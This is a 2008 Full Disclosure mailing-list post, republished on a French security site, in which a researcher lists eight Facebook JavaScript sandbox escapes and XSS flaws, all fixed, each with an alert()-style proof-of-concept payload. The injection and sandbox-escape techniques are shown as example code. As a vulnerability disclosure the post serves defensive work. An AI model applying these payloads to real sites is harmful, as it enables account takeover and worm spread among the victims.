Publié le 04-07-2008 11:07 sur la mailing-list Full Disclosure

Pub : CA Anti-Virus 2007 - Protection exhaustive contre l’intrusion de virus!

The two remaining vulnerabilities seem to have been fixed today.
Updated information:


7) Escaping JS sandbox with literal String reference
Impact: execution of unrestricted JS on canvas pages or profiles
(mouseclick required on profile pages)
Browsers: FF
Description: __parent__ property of a String object can be referenced
using a literal expression and the "bracket syntax" to get a Window
reference.
Reported: June 21, 2008
Fixed: yes
Example:

"a"["__parent__"].eval("alert('any javascript here');");



8) Escaping JS sandbox with literal RegExp reference
Impact: execution of unrestricted JS on canvas pages or profiles
(mouseclick required on profile pages)
Browsers: FF
Description: __parent__ property of a RegExp object can be referenced
using a literal expression and the "bracket syntax" to get a Window
reference.
Reported: June 21, 2008
Fixed: yes
Example:

/a/["__parent__"].eval("alert('any javascript here');");




On Thu, Jul 3, 2008 at 2:01 AM, Jouko Pynnonen <jouko@iki.fi> wrote:
> Hello,
>
> This is a summary of various Facebook security issues found and
> reported since June 13, 2008. Two of the vulnerabilities still remain
> on the site, so no details of them are disclosed here. The rest have
> been fixed.
>
> Any of these could be exploited to take over the victim's web browser
> temporarily to e.g. read inbox messages, forcibly install FB
> applications, manipulate friend lists, post messages as the victim
> user, etc. Any of these would also allow creation of a
> self-propagating JavaScript virus/worm.
>
> Most of the issues require the victim user to click on a profile box
> or visit a canvas page of an application in order to trigger the
> injected JavaScript. Issues 2) and 3) don't require mouse clicks.
>
> The vulnerabilities were tested with two browsers: Firefox 3 (Linux +
> Windows) and Internet Explorer 7.
>
>
>
> 1) Escaping JS sandbox with literal Function constructor reference
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages)
> Description: The JS sandbox denies references to Function.constructor
> but using a literal such as "function f() { }" in the code and
> refering to its constructor with the "bracket syntax" was possible.
> The example below uses this method and calls the constructor with a
> string argument, then calls the resulting Function object.
> Browsers: FF, IE
> Reported: June 13, 2008
> Fixed: yes
> Example:
>
> (function f(){}["constructor"]("alert('any javascript here');"))();
>
>
>
> 2) Fb:silverlight JS injection
> Impact: execution of unrestricted JS on canvas pages, profiles
> Description: Simple XSS, described in the previous message to full-disclo=
sure.
> Browsers: FF, IE
> Reported: June 16, 2008
> Fixed: yes
> Example:
>
> <fb:silverlight silverlightsrc=3D"a"
> width=3D"" height=3D",any_javascript_code_here);//" />
>
>
>
> 3) Injecting JS in Feeds
> Impact: execution of unrestricted JS when viewing Feeds on profile
> page or the "home" page
> Description: Insufficient input validation in the
> publishTemplatizedAction API method.
> Browsers: FF, IE
> Reported: June 16, 2008
> Fixed: yes
> Example:
>
> # using the perl API
>
> $facebook->feed->publish_templatized_action( title =3D> "My Title",
> title_template =3D> "{actor} is testing feed stories",
> body_template =3D> "hello",
> image_1 =3D> "http://www.mysite.com/image.gif'"
> onload=3D(function&#9;f(){}['constructor']('alert(1)'))();",
> image_1_link =3D> "http://www.mysite.com" );
>
>
>
> 4) Escaping JS sandbox with literal Number reference
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages)
> Description: Using the "bracket syntax" to reference the __parent__
> property of a floating point number to get a Window object reference,
> then calling its eval() to run arbitrary code. IE doesn't support the
> property.
> Browsers: FF
> Reported: June 18, 2008
> Fixed: yes
> Example:
>
> <script>
> 1.["__parent__"].eval("alert('any javascript here');");
> </script>
>
>
>
> 5) Injecting JS in video attachments
> Impact: execution of unrestricted JS when a inbox, wall or forum
> message is viewed (mouseclick required)
> Description: When sharing video content with the
> http://www.facebook.com/sharer.php form, some input fields can be
> modified e.g. with JavaScript. The example below can be typed in the
> address bar to inject JS in a message.
> Browsers: FF, IE
> Reported: June 20, 2008
> Fixed: yes
> Example:
>
> javascript:f=3Ddocument.forms[0];f['attachment[params][video][src]'].val=
ue=3D'#"
> a=3Db><img src=3D"#" onerror=3Dalert("hello")>
>
>
>
> 6) Escaping JS sandbox with E4X
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages). Works in browsers supporting
> E4X (Firefox)
> Description: JS parser in browsers supporting E4X understand XML,
> which can contain multi-line strings. Facebook's JS sandbox technology
> didn't expect XML and multi-line strings. The example below
> demonstrates how this could be used to fool the sandbox logic.
> Browsers: FF
> Reported: June 26, 2008
> Fixed: yes
> Example:
>
> <script>
> <x x=3D"
> x" {alert('any javascript')}=3D"x"
> />
> </script>
>
>
>
> 7) Escaping JS sandbox
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages)
> Browsers: FF
> Reported: June 21, 2008
> Fixed: no
>
>
>
> 8) Escaping JS sandbox
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages)
> Browsers: FF
> Reported: June 21, 2008
> Fixed: no
>
>
>
>
> --
> Jouko Pynn=F6nen <jouko@iki.fi>
> http://iki.fi/jouko
> Finland
>



-- =

Jouko Pynn=F6nen <jouko@iki.fi>
http://iki.fi/jouko
Finland

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

BitDefender rejoint l´association ELA dans son combat contre la leucodystrophie

BitDefender, annonce son engagement auprès de l´association ELA dans son combat contre la leucodystrophie.

Le Président de Skype s´explique sur la faille de sécurité en Chine

Un logiciel proposé par un partenaire Chinois de Skype serait piégé. Ecoute possible ? Le patron de Skype s'explique.

AxCrypt File Encryption

Chiffrer des documents, rapidement et gratuitement. AxCrypt 1.6.4.4 est fait pour vous.

Piége électronique sur le site de DJ Verano

Une des stars de la scène elecro, DJ Verano, se fait pirater son site Internet. Un virus serait passé par là.

Microsoft Business Intelligence 2008

Microsoft dévoile la prochaine génération de SQL Server et encourage les entreprises à exploiter davantage l´analyse décisionnelle.

Faux site Paypal France

Nouvelle tentative de fraude à destination des clients de Paypal France.

Les logiciels de chiffrement de Prim´X passent au 64BITS

La suite de chiffrement de l´éditeur est compatible avec les plates-formes 64 bits et Windows Server 2008.

Des livres en Or, un spammeur par omission

Vous en avez plein le dos des spams ? Vous avez laissé, en toute confiance, votre courriel sur le site Des livres en Or ? Dommage pour vous !